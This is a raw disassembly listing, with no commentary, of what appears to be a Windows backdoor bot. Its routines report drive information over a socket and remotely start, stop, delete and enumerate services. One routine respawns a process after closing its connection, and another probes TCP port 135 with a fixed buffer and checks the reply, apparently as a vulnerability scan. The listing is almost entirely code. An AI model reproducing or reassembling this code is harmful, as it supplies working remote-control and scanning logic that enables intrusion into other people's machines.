push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_419AA0
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_40DBE6
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_40DBA8
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_40DBA8
; ---------------------------------------------------------------------------
loc_40DBE6: ; CODE XREF: sub_40DB83+4B�j
mov eax, edi
jmp short loc_40DBEF
; ---------------------------------------------------------------------------
loc_40DBEA: ; CODE XREF: sub_40DB83+72�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_40DBEF: ; CODE XREF: sub_40DB83+65�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_40DBEA
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40DB83 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DC01(LPCSTR lpRootPathName)
sub_40DC01 proc near ; CODE XREF: sub_40DDAD+51�p
; sub_40DDAD+87�p
lpRootPathName = dword ptr 4
push [esp+lpRootPathName] ; lpRootPathName
call GetDriveTypeA ; GetDriveTypeA
sub eax, 0
jz short loc_40DC44
dec eax
jz short loc_40DC3E
dec eax
dec eax
jz short loc_40DC38
dec eax
jz short loc_40DC32
dec eax
jz short loc_40DC2C
dec eax
jz short loc_40DC26
mov eax, 42FD6Ch
retn
; ---------------------------------------------------------------------------
loc_40DC26: ; CODE XREF: sub_40DC01+1D�j
mov eax, 4305F0h
retn
; ---------------------------------------------------------------------------
loc_40DC2C: ; CODE XREF: sub_40DC01+1A�j
mov eax, 4305E8h
retn
; ---------------------------------------------------------------------------
loc_40DC32: ; CODE XREF: sub_40DC01+17�j
mov eax, 4305E0h
retn
; ---------------------------------------------------------------------------
loc_40DC38: ; CODE XREF: sub_40DC01+14�j
mov eax, 4305D8h
retn
; ---------------------------------------------------------------------------
loc_40DC3E: ; CODE XREF: sub_40DC01+10�j
mov eax, 4305D0h
retn
; ---------------------------------------------------------------------------
loc_40DC44: ; CODE XREF: sub_40DC01+D�j
mov eax, 4305C8h
retn
sub_40DC01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40DC4A(int, LPCSTR lpDirectoryName)
sub_40DC4A proc near ; CODE XREF: sub_40DC92+12�p
FreeBytesAvailableToCaller= ULARGE_INTEGER ptr -18h
TotalNumberOfFreeBytes= ULARGE_INTEGER ptr -10h
TotalNumberOfBytes= ULARGE_INTEGER ptr -8
arg_0 = dword ptr 8
lpDirectoryName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov dword ptr [ebp+FreeBytesAvailableToCaller], eax
mov dword ptr [ebp+FreeBytesAvailableToCaller+4], eax
mov dword ptr [ebp+TotalNumberOfFreeBytes], eax
mov dword ptr [ebp+TotalNumberOfFreeBytes+4], eax
mov dword ptr [ebp+TotalNumberOfBytes], eax
mov dword ptr [ebp+TotalNumberOfBytes+4], eax
mov eax, GetDiskFreeSpaceExA
test eax, eax
jz short loc_40DC7F
lea ecx, [ebp+TotalNumberOfFreeBytes]
push ecx ; lpTotalNumberOfFreeBytes
lea ecx, [ebp+TotalNumberOfBytes]
push ecx ; lpTotalNumberOfBytes
lea ecx, [ebp+FreeBytesAvailableToCaller]
push ecx ; lpFreeBytesAvailableToCaller
push [ebp+lpDirectoryName] ; lpDirectoryName
call eax ; GetDiskFreeSpaceExA
loc_40DC7F: ; CODE XREF: sub_40DC4A+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+FreeBytesAvailableToCaller]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40DC4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40DC92(int, LPCSTR lpDirectoryName)
sub_40DC92 proc near ; CODE XREF: sub_40C3BE+1F3�p
; sub_40DDAD+17�p
var_198 = byte ptr -198h
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
lpDirectoryName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 198h
push esi
push edi
push [ebp+lpDirectoryName] ; lpDirectoryName
lea eax, [ebp+var_18]
push eax ; int
call sub_40DC4A
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_40DD6A
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_40DD6A
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_40DD6A
push ebx
mov ebx, 400h
push 0
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_419F90
push edx
push eax
call sub_40DB83
mov edi, 4305FCh
push eax
mov esi, 80h
push edi
lea eax, [ebp+var_198]
push esi
push eax
call sub_417EDA
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_419F90
push edx
push eax
call sub_40DB83
push eax
push edi
lea eax, [ebp+var_118]
push esi
push eax
call sub_417EDA
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_419F90
push edx
push eax
call sub_40DB83
push eax
push edi
lea eax, [ebp+var_98]
push esi
push eax
call sub_417EDA
add esp, 18h
pop ebx
jmp short loc_40DD99
; ---------------------------------------------------------------------------
loc_40DD6A: ; CODE XREF: sub_40DC92+2C�j
; sub_40DC92+3B�j ...
mov esi, 4305F4h
lea eax, [ebp+var_198]
push esi
push eax
call sub_41795B
lea eax, [ebp+var_118]
push esi
push eax
call sub_41795B
lea eax, [ebp+var_98]
push esi
push eax
call sub_41795B
add esp, 18h
loc_40DD99: ; CODE XREF: sub_40DC92+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_198]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40DC92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40DDAD(SOCKET s, int, int, LPCSTR lpDirectoryName)
sub_40DDAD proc near ; CODE XREF: sub_40DE7F+17�p
; sub_40DE7F+60�p
var_500 = dword ptr -500h
var_300 = dword ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
lpRootPathName = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+lpRootPathName]
push esi
push edi
lea eax, [ebp+var_300]
push ebx ; lpDirectoryName
push eax ; int
call sub_40DC92
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push 4305F4h
rep movsd
push eax
call sub_417D80
add esp, 10h
test eax, eax
jnz short loc_40DE20
push ebx
push ebx ; lpRootPathName
call sub_40DC01
pop ecx
push eax
push 430658h
lea eax, [ebp+var_500]
push 200h
push eax
call sub_417EDA
add esp, 14h
jmp short loc_40DE54
; ---------------------------------------------------------------------------
loc_40DE20: ; CODE XREF: sub_40DDAD+4D�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx ; lpRootPathName
call sub_40DC01
pop ecx
push eax
push 430608h
lea eax, [ebp+var_500]
push 200h
push eax
call sub_417EDA
add esp, 20h
loc_40DE54: ; CODE XREF: sub_40DDAD+71�j
push 1 ; int
lea eax, [ebp+var_500]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+var_500]
push eax
call sub_40CB08
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40DDAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40DE7F(SOCKET s, int, int, LPCSTR lpDirectoryName)
sub_40DE7F proc near ; CODE XREF: sub_40FCA3+5938�p
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
lpDirectoryName = dword ptr 14h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+lpDirectoryName], ebx
jz short loc_40DEA0
push [ebp+lpDirectoryName] ; lpDirectoryName
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40DDAD
add esp, 10h
jmp short loc_40DEFF
; ---------------------------------------------------------------------------
loc_40DEA0: ; CODE XREF: sub_40DE7F+9�j
push esi
push edi
push ebx ; lpBuffer
push ebx ; nBufferLength
call GetLogicalDriveStringsA ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_418175
pop ecx
mov edi, eax
push edi ; lpBuffer
push esi ; nBufferLength
call GetLogicalDriveStringsA ; GetLogicalDriveStringsA
cmp [edi], bl
mov esi, edi
jz short loc_40DEF6
loc_40DEC4: ; CODE XREF: sub_40DE7F+75�j
push 4306A4h
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_40DEE7
push esi ; lpDirectoryName
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40DDAD
add esp, 10h
loc_40DEE7: ; CODE XREF: sub_40DE7F+54�j
push esi
call sub_4180D0
lea esi, [esi+eax+1]
pop ecx
cmp [esi], bl
jnz short loc_40DEC4
loc_40DEF6: ; CODE XREF: sub_40DE7F+43�j
push edi ; lpMem
call sub_418227
pop ecx
pop edi
pop esi
loc_40DEFF: ; CODE XREF: sub_40DE7F+1F�j
pop ebx
pop ebp
retn
sub_40DE7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF02 proc near ; DATA XREF: sub_40F1EA+14�o
var_27C = dword ptr -27Ch
CurrentDirectory= byte ptr -25Ch
CommandLine = byte ptr -158h
StartupInfo = _STARTUPINFOA ptr -54h
ProcessInformation= _PROCESS_INFORMATION ptr -10h
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword ptr byte_445EDC+5998h ; s
call closesocket_0
call sub_4175E2
call WSACleanup_0
call WSACleanup_0
mov ebx, Sleep
push 64h ; dwMilliseconds
call ebx ; Sleep
xor edi, edi
push 10h
lea eax, [ebp+ProcessInformation]
push edi
push eax
call sub_4179E0
push 44h
lea eax, [ebp+StartupInfo]
pop esi
push esi
push edi
push eax
call sub_4179E0
add esp, 18h
mov [ebp+StartupInfo.cb], esi
mov esi, 104h
lea eax, [ebp+CurrentDirectory]
push esi ; uSize
push eax ; lpBuffer
mov [ebp+StartupInfo.lpTitle], 440F9Ch
mov [ebp+StartupInfo.dwFlags], 1
mov [ebp+StartupInfo.wShowWindow], di
call GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+CommandLine]
push esi
push eax
push edi
call dword ptr byte_424084+4
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
lea eax, [ebp+CurrentDirectory]
push eax ; lpCurrentDirectory
push edi ; lpEnvironment
push 28h ; dwCreationFlags
push 1 ; bInheritHandles
push edi ; lpThreadAttributes
lea eax, [ebp+CommandLine]
push edi ; lpProcessAttributes
push eax ; lpCommandLine
push edi ; lpApplicationName
call CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_40DFC7
push 64h ; dwMilliseconds
call ebx ; Sleep
push [ebp+ProcessInformation.hProcess]
mov esi, dword ptr byte_424074+4
call esi
push [ebp+ProcessInformation.hThread]
call esi
loc_40DFC7: ; CODE XREF: sub_40DF02+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], 44A214h
mov eax, [esp+27Ch+var_27C]
mov large fs:0, eax
add esp, 8
push edi
call dword ptr byte_424150
pop edi
pop esi
pop ebx
sub_40DF02 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFEA proc near ; CODE XREF: sub_40E022+125�p
; sub_40E022+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40E018
loc_40DFFB: ; CODE XREF: sub_40DFEA+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_41A040
add esp, 0Ch
test eax, eax
jz short loc_40E01E
inc esi
cmp esi, edi
jl short loc_40DFFB
loc_40E018: ; CODE XREF: sub_40DFEA+F�j
xor al, al
loc_40E01A: ; CODE XREF: sub_40DFEA+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E01E: ; CODE XREF: sub_40DFEA+27�j
mov al, 1
jmp short loc_40E01A
sub_40DFEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E022(char *cp, SOCKET s)
sub_40E022 proc near ; CODE XREF: .text:00403A66�p
; .text:00403B52�p
buf = byte ptr -2010h
var_200E = byte ptr -200Eh
name = sockaddr ptr -10h
cp = dword ptr 8
s = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_417F30
mov eax, [ebp+s]
push esi
dec eax
push edi
jz short loc_40E063
dec eax
jz short loc_40E041
dec eax
loc_40E03B: ; CODE XREF: sub_40E022+57�j
xor eax, eax
loc_40E03D: ; CODE XREF: sub_40E022+3F�j
; sub_40E022+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40E041: ; CODE XREF: sub_40E022+16�j
push 3 ; int
push 1388h ; hostshort
push [ebp+cp] ; cp
call inet_addr_0
push eax ; int
call sub_408026
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_40E03D
; ---------------------------------------------------------------------------
loc_40E063: ; CODE XREF: sub_40E022+13�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket_0
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+s], esi
jz short loc_40E03B
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+name]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push 87h ; hostshort
call htons_2
push [ebp+cp] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_40B862
pop ecx
mov dword ptr [ebp+name.sa_data+2], eax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call connect_0
cmp eax, edi
jz loc_40E17F
push ebx ; flags
push 48h ; len
push offset buf ; buf
push esi ; s
call send_0
cmp eax, edi
jz loc_40E17F
mov esi, 2000h
push ebx ; flags
lea eax, [ebp+buf]
push esi ; len
push eax ; buf
push [ebp+s] ; s
call recv_0
cmp eax, edi
jz loc_40E17F
cmp [ebp+var_200E], 0Ch
jnz short loc_40E17F
push ebx ; flags
push 18h ; len
push offset byte_4306F4 ; buf
push [ebp+s] ; s
call send_0
cmp eax, edi
jz short loc_40E17F
push ebx ; flags
lea eax, [ebp+buf]
push esi ; len
push eax ; buf
push [ebp+s] ; s
call recv_0
mov esi, eax
cmp esi, edi
jz short loc_40E17F
cmp [ebp+var_200E], 2
jnz short loc_40E17F
push 10h
push 430710h
lea eax, [ebp+buf]
push esi
push eax
call sub_40DFEA
add esp, 10h
test al, al
jz short loc_40E15F
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_40E17F
; ---------------------------------------------------------------------------
loc_40E15F: ; CODE XREF: sub_40E022+12F�j
push 10h
push 430724h
lea eax, [ebp+buf]
push esi
push eax
call sub_40DFEA
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_40E17F: ; CODE XREF: sub_40E022+9B�j
; sub_40E022+B2�j ...
push [ebp+s] ; s
call closesocket_0
mov eax, ebx
pop ebx
jmp loc_40E03D
sub_40E022 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E190(SOCKET s, int, char)
sub_40E190 proc near ; CODE XREF: sub_40FB24+3D�p
; sub_40FCA3+1BD�p ...
buf = byte ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+buf]
push [ebp+arg_4]
push 200h
push eax
call sub_419C4F
add esp, 10h
lea eax, [ebp+buf]
push 0 ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
leave
retn
sub_40E190 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E1D6(SOCKET s, int, int, int, int)
sub_40E1D6 proc near ; CODE XREF: sub_401000+88�p
; sub_401444+76�p ...
var_400 = byte ptr -400h
buf = byte ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, 43074Ch
jnz short loc_40E1F1
mov edi, 430744h
loc_40E1F1: ; CODE XREF: sub_40E1D6+14�j
push edi
call sub_4180D0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_4180D0
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push 42744Ch
push esi
push eax
call sub_417EDA
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+buf]
push [ebp+arg_4]
push edi
push 430738h
push eax
call sub_41795B
add esp, 2Ch
lea eax, [ebp+buf]
push 0 ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40E26F
push 7D0h ; dwMilliseconds
call Sleep ; Sleep
locret_40E26F: ; CODE XREF: sub_40E1D6+8C�j
leave
retn
sub_40E1D6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E271(int, LPCSTR lpServiceName)
sub_40E271 proc near ; CODE XREF: sub_40FCA3:loc_411D6D�p
arg_0 = dword ptr 4
lpServiceName = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+lpServiceName]
test edi, edi
jz short loc_40E2D6
lea esi, [eax+eax*2]
push 0 ; lpServiceArgVectors
shl esi, 2
push 0 ; dwNumServiceArgs
push dword ptr [esi+430760h] ; dwControl
push edi ; lpServiceName
push eax ; int
call sub_40E2F8
add esp, 14h
test eax, eax
jnz short loc_40E2B9
push edi
push dword ptr [esi+43075Ch]
mov esi, 44A8E8h
push 430894h
push esi
call sub_41795B
add esp, 10h
jmp short loc_40E2F3
; ---------------------------------------------------------------------------
loc_40E2B9: ; CODE XREF: sub_40E271+2A�j
push eax
call sub_40E39A
push eax
push edi
mov esi, 44A8E8h
push 430858h
push esi
call sub_41795B
add esp, 14h
jmp short loc_40E2F3
; ---------------------------------------------------------------------------
loc_40E2D6: ; CODE XREF: sub_40E271+C�j
lea eax, [eax+eax*2]
mov esi, 44A8E8h
push dword ptr unk_430758[eax*4]
push 430820h
push esi
call sub_41795B
add esp, 0Ch
loc_40E2F3: ; CODE XREF: sub_40E271+46�j
; sub_40E271+63�j
mov eax, esi
pop edi
pop esi
retn
sub_40E271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E2F8(int, LPCSTR lpServiceName, DWORD dwControl, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors)
sub_40E2F8 proc near ; CODE XREF: sub_40E271+20�p
ServiceStatus = _SERVICE_STATUS ptr -1Ch
arg_0 = dword ptr 8
lpServiceName = dword ptr 0Ch
dwControl = dword ptr 10h
dwNumServiceArgs= dword ptr 14h
lpServiceArgVectors= dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh ; dwDesiredAccess
push ebx ; lpDatabaseName
push ebx ; lpMachineName
call OpenSCManagerA ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_40E31F
call GetLastError
mov ebx, eax
jmp short loc_40E394
; ---------------------------------------------------------------------------
loc_40E31F: ; CODE XREF: sub_40E2F8+1B�j
push esi
push 0F01FFh ; dwDesiredAccess
push [ebp+lpServiceName] ; lpServiceName
push edi ; hSCManager
call OpenServiceA ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_40E33F
call GetLastError
mov ebx, eax
jmp short loc_40E38C
; ---------------------------------------------------------------------------
loc_40E33F: ; CODE XREF: sub_40E2F8+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_40E372
cmp eax, 3
jz short loc_40E363
jle short loc_40E385
cmp eax, 6
jg short loc_40E385
lea eax, [ebp+ServiceStatus]
push eax ; lpServiceStatus
push [ebp+dwControl] ; dwControl
push esi ; hService
call ControlService ; ControlService
jmp short loc_40E379
; ---------------------------------------------------------------------------
loc_40E363: ; CODE XREF: sub_40E2F8+52�j
push [ebp+lpServiceArgVectors] ; lpServiceArgVectors
push [ebp+dwNumServiceArgs] ; dwNumServiceArgs
push esi ; hService
call StartServiceA ; StartServiceA
jmp short loc_40E379
; ---------------------------------------------------------------------------
loc_40E372: ; CODE XREF: sub_40E2F8+4D�j
push esi ; hService
call DeleteService ; DeleteService
loc_40E379: ; CODE XREF: sub_40E2F8+69�j
; sub_40E2F8+78�j
test eax, eax
jnz short loc_40E385
call GetLastError
mov ebx, eax
loc_40E385: ; CODE XREF: sub_40E2F8+54�j
; sub_40E2F8+59�j ...
push esi ; hSCObject
call CloseServiceHandle ; CloseServiceHandle
loc_40E38C: ; CODE XREF: sub_40E2F8+45�j
push edi ; hSCObject
call CloseServiceHandle ; CloseServiceHandle
pop esi
loc_40E394: ; CODE XREF: sub_40E2F8+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40E2F8 endp
; =============== S U B R O U T I N E =======================================
sub_40E39A proc near ; CODE XREF: sub_40E271+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40E44F
jz loc_40E448
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40E412
jz short loc_40E408
mov ecx, eax
sub ecx, 3
jz short loc_40E3FE
dec ecx
dec ecx
jz short loc_40E3F4
dec ecx
jz short loc_40E3EA
sub ecx, 51h
jz short loc_40E3E0
sub ecx, 24h
jnz loc_40E4C5 ; default
; jumptable 0040E46C cases 1,5,6,8,9,12,13,15,16
push 430D48h
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E3E0: ; CODE XREF: sub_40E39A+31�j
push 430D1Ch
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E3EA: ; CODE XREF: sub_40E39A+2C�j
push 430D04h
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E3F4: ; CODE XREF: sub_40E39A+29�j
push 430CD0h
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E3FE: ; CODE XREF: sub_40E39A+25�j
push 430CA4h
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E408: ; CODE XREF: sub_40E39A+1E�j
push 430C50h
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E412: ; CODE XREF: sub_40E39A+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40E441
dec ecx
jz short loc_40E43A
dec ecx
jz short loc_40E433
dec ecx
jnz loc_40E4C5 ; default
; jumptable 0040E46C cases 1,5,6,8,9,12,13,15,16
push 430C34h
jmp loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E433: ; CODE XREF: sub_40E39A+86�j
push 430C04h
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E43A: ; CODE XREF: sub_40E39A+83�j
push 430BA8h
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E441: ; CODE XREF: sub_40E39A+80�j
push 430B58h
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E448: ; CODE XREF: sub_40E39A+11�j
push 430B28h
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E44F: ; CODE XREF: sub_40E39A+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40E4C5 ; default
; jumptable 0040E46C cases 1,5,6,8,9,12,13,15,16
jz short loc_40E4B2
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40E4C5 ; default
; jumptable 0040E46C cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_40E506[ecx]
jmp off_40E4DE[ecx*4] ; switch jump
loc_40E473: ; DATA XREF: .text:off_40E4DE�o
push 430B00h ; jumptable 0040E46C case 7
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E47A: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 430AA8h ; jumptable 0040E46C case 17
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E481: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 430A60h ; jumptable 0040E46C case 10
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E488: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 430A3Ch ; jumptable 0040E46C case 0
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E48F: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 430A14h ; jumptable 0040E46C case 2
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E496: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 4309B8h ; jumptable 0040E46C case 11
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E49D: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 43098Ch ; jumptable 0040E46C case 14
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E4A4: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 430930h ; jumptable 0040E46C case 3
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E4AB: ; CODE XREF: sub_40E39A+D2�j
; DATA XREF: .text:off_40E4DE�o
push 430908h ; jumptable 0040E46C case 4
jmp short loc_40E4B7
; ---------------------------------------------------------------------------
loc_40E4B2: ; CODE XREF: sub_40E39A+BE�j
push 4308E8h
loc_40E4B7: ; CODE XREF: sub_40E39A+41�j
; sub_40E39A+4B�j ...
push 44A218h
call sub_41795B
pop ecx
pop ecx
jmp short loc_40E4D8
; ---------------------------------------------------------------------------
loc_40E4C5: ; CODE XREF: sub_40E39A+36�j
; sub_40E39A+89�j ...
push eax ; default
; jumptable 0040E46C cases 1,5,6,8,9,12,13,15,16
push 4308C4h
push 44A218h
call sub_41795B
add esp, 0Ch
loc_40E4D8: ; CODE XREF: sub_40E39A+129�j
mov eax, 44A218h
retn
sub_40E39A endp
; ---------------------------------------------------------------------------
off_40E4DE dd offset loc_40E488 ; DATA XREF: sub_40E39A+D2�r
dd offset loc_40E48F ; jump table for switch statement
dd offset loc_40E4A4
dd offset loc_40E4AB
dd offset loc_40E473
dd offset loc_40E481
dd offset loc_40E496
dd offset loc_40E49D
dd offset loc_40E47A
dd offset loc_40E4C5
byte_40E506 db 0, 9, 1, 2 ; DATA XREF: sub_40E39A+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E518(SOCKET s, int, int)
sub_40E518 proc near ; CODE XREF: sub_40FCA3+20F5�p
var_38C = dword ptr -38Ch
Services = _ENUM_SERVICE_STATUSA ptr -18Ch
pcbBytesNeeded = dword ptr -24h
var_20 = byte ptr -20h
hSCObject = dword ptr -0Ch
ResumeHandle = dword ptr -8
ServicesReturned= dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh ; dwDesiredAccess
push ebx ; lpDatabaseName
push ebx ; lpMachineName
mov [ebp+ResumeHandle], ebx
call OpenSCManagerA ; OpenSCManagerA
push ebx ; int
mov [ebp+hSCObject], eax
push [ebp+arg_8] ; int
push 430DDCh ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40E550: ; CODE XREF: sub_40E518+123�j
lea eax, [ebp+ResumeHandle]
push eax ; lpResumeHandle
lea eax, [ebp+ServicesReturned]
push eax ; lpServicesReturned
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
lea eax, [ebp+Services]
push 168h ; cbBufSize
push eax ; lpServices
push 3 ; dwServiceState
push 30h ; dwServiceType
push [ebp+hSCObject] ; hSCManager
call EnumServicesStatusA ; EnumServicesStatusA
test eax, eax
jnz short loc_40E58A
call GetLastError
cmp eax, 0EAh
jnz loc_40E641
loc_40E58A: ; CODE XREF: sub_40E518+5F�j
xor edi, edi
